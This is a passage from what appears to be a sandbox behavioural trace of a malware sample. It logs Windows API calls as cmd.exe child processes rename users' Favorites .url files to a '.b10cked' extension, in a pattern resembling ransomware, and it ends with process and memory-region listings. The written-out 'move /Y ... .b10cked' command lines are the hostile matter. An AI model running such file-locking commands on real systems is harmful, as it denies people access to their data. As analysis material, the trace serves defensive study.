(in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x1, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x0, lpData=0x2eeb38*=0x1, lpcbData=0x2eeb30*=0x1000) returned 0x2 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x0, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x9, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.461] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: 
lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x9, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.461] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x0, lpData=0x2eeb38*=0x9, lpcbData=0x2eeb30*=0x1000) returned 0x2 [0215.461] RegCloseKey (hKey=0x40) returned 0x0 [0215.461] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.461] srand (_Seed=0x5b8863b1) [0215.461] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked\"" [0215.461] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked\"" [0215.461] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.461] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4418f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.461] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.461] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.461] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.461] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.461] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.461] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.461] _wcsicmp 
(_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.461] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.461] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.461] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.461] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.462] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.462] GetEnvironmentStringsW () returned 0x4422e8* [0215.462] FreeEnvironmentStringsW (penv=0x4422e8) returned 1 [0215.462] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.462] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.462] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.462] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.462] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.462] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.462] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.462] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.462] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0215.462] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.462] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef8f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.462] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef8f8, lpFilePart=0x2ef8f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef8f4*="Desktop") returned 0x18 [0215.462] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.462] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef674 | out: lpFindFileData=0x2ef674) 
returned 0x440028 [0215.462] FindClose (in: hFindFile=0x440028 | out: hFindFile=0x440028) returned 1 [0215.462] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef674 | out: lpFindFileData=0x2ef674) returned 0x440028 [0215.463] FindClose (in: hFindFile=0x440028 | out: hFindFile=0x440028) returned 1 [0215.463] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef674 | out: lpFindFileData=0x2ef674) returned 0x440028 [0215.463] FindClose (in: hFindFile=0x440028 | out: hFindFile=0x440028) returned 1 [0215.463] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.463] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.463] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.463] GetEnvironmentStringsW () returned 0x442b08* [0215.463] FreeEnvironmentStringsW (penv=0x442b08) returned 1 [0215.463] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.463] GetConsoleOutputCP () returned 0x1b5 [0215.464] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.464] GetUserDefaultLCID () returned 0x409 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efa38, cchData=128 | out: lpLCData="0") returned 2 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efa38, cchData=128 | out: lpLCData="0") returned 2 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efa38, cchData=128 | out: lpLCData="1") returned 2 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.464] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.464] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.465] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.465] GetConsoleTitleW (in: lpConsoleTitle=0x4308f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.465] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.465] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.465] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.466] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.466] _wcsicmp (_String1="move", _String2=")") returned 68 [0215.466] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0215.466] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0215.466] _wcsicmp (_String1="IF", _String2="move") returned -4 [0215.466] _wcsicmp (_String1="IF/?", 
_String2="move") returned -4 [0215.466] _wcsicmp (_String1="REM", _String2="move") returned 5 [0215.466] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0215.469] GetConsoleTitleW (in: lpConsoleTitle=0x2ef730, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.469] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0215.469] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0215.469] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0215.469] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0215.469] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0215.469] _wcsicmp (_String1="move", _String2="CD") returned 10 [0215.469] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0215.469] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0215.469] _wcsicmp (_String1="move", _String2="REN") returned -5 [0215.469] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0215.469] _wcsicmp (_String1="move", _String2="SET") returned -6 [0215.469] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0215.469] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0215.469] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0215.469] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0215.469] _wcsicmp (_String1="move", _String2="MD") returned 11 [0215.469] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0215.469] _wcsicmp (_String1="move", _String2="RD") returned -5 [0215.469] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0215.469] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0215.469] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0215.469] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0215.470] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0215.470] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0215.470] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0215.470] _wcsicmp 
(_String1="move", _String2="VER") returned -9 [0215.470] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0215.470] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0215.470] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0215.470] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0215.470] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0215.470] _wcsicmp (_String1="move", _String2="START") returned -6 [0215.470] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0215.470] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0215.470] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0215.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.471] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef4ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef4e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef4e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0215.471] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0215.471] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 
[0215.472] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.472] _wcsnicmp 
(_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.472] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0215.473] _wcsicmp (_String1="MSNSPO~1.URL", _String2=".") returned 63 [0215.473] _wcsicmp (_String1="MSNSPO~1.URL", _String2="..") returned 63 [0215.473] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnspo~1.url")) returned 0x20 [0215.473] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x441e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.473] SetErrorMode (uMode=0x0) returned 0x0 [0215.473] SetErrorMode (uMode=0x1) returned 0x0 [0215.473] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL", nBufferLength=0x104, lpBuffer=0x2eee74, lpFilePart=0x2eee5c | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL", lpFilePart=0x2eee5c*="MSNSPO~1.URL") returned 0x2f [0215.473] SetErrorMode (uMode=0x0) returned 0x1 [0215.473] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1" (normalized: "c:\\users\\default\\favori~1\\msnweb~1")) returned 0x12 [0215.473] _wcsicmp (_String1="MSNSPO~1.URL", _String2=".") returned 63 [0215.473] _wcsicmp (_String1="MSNSPO~1.URL", _String2="..") returned 63 [0215.473] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnspo~1.url")) returned 0x20 [0215.473] SetErrorMode (uMode=0x0) returned 0x0 [0215.473] SetErrorMode (uMode=0x1) returned 0x0 [0215.473] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL", nBufferLength=0x104, lpBuffer=0x2ef2f0, lpFilePart=0x2ef088 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL", lpFilePart=0x2ef088*="MSNSPO~1.URL") returned 0x2f [0215.473] SetErrorMode (uMode=0x0) returned 0x1 [0215.473] SetErrorMode (uMode=0x0) returned 0x0 
[0215.473] SetErrorMode (uMode=0x1) returned 0x0 [0215.474] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked", nBufferLength=0x104, lpBuffer=0x2ef4f8, lpFilePart=0x2ef088 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked", lpFilePart=0x2ef088*="MSN Sports.url.b10cked") returned 0x39 [0215.474] SetErrorMode (uMode=0x0) returned 0x1 [0215.474] SetLastError (dwErrCode=0x0) [0215.474] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn sports.url.b10cked")) returned 0xffffffff [0215.474] GetLastError () returned 0x2 [0215.474] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL", fInfoLevelId=0x1, lpFindFileData=0x2eea04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eea04) returned 0x430eb0 [0215.474] FindNextFileW (in: hFindFile=0x430eb0, lpFindFileData=0x2eea04 | out: lpFindFileData=0x2eea04) returned 0 [0215.474] GetLastError () returned 0x12 [0215.474] FindClose (in: hFindFile=0x430eb0 | out: hFindFile=0x430eb0) returned 1 [0215.475] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL", fInfoLevelId=0x1, lpFindFileData=0x441c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x441c08) returned 0x430eb0 [0215.475] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked", nBufferLength=0x104, lpBuffer=0x2eec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked", lpFilePart=0x0) returned 0x39 [0215.475] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url", nBufferLength=0x104, lpBuffer=0x2eec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url", lpFilePart=0x0) returned 0x31 [0215.475] 
GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn sports.url")) returned 0x20 [0215.475] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn sports.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn sports.url.b10cked"), dwFlags=0x3) returned 1 [0215.476] FindClose (in: hFindFile=0x430eb0 | out: hFindFile=0x430eb0) returned 1 [0215.476] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eec50 | out: _Buffer=" 1") returned 9 [0215.476] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.476] GetFileType (hFile=0x7) returned 0x2 [0215.597] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0215.597] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eebdc | out: lpMode=0x2eebdc) returned 1 [0215.597] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.597] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eec10 | out: lpConsoleScreenBufferInfo=0x2eec10) returned 1 [0215.597] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0215.597] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eec50 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0215.597] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eec34, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eec34*=0x1a) returned 1 [0215.597] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.597] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.598] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0215.598] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.598] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.598] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.598] SetConsoleInputExeNameW () returned 0x1 [0215.598] GetConsoleOutputCP () returned 0x1b5 [0215.598] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.598] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.598] exit (_Code=0) Process: id = "540" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16600" os_pid = "0xd40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31814 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31815 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31816 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31817 start_va = 0xf0000 end_va = 
0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31818 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31819 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31820 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31821 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31822 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 31823 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31950 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31951 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31952 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31953 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 31954 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 
region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 31955 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31956 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31957 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31958 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" 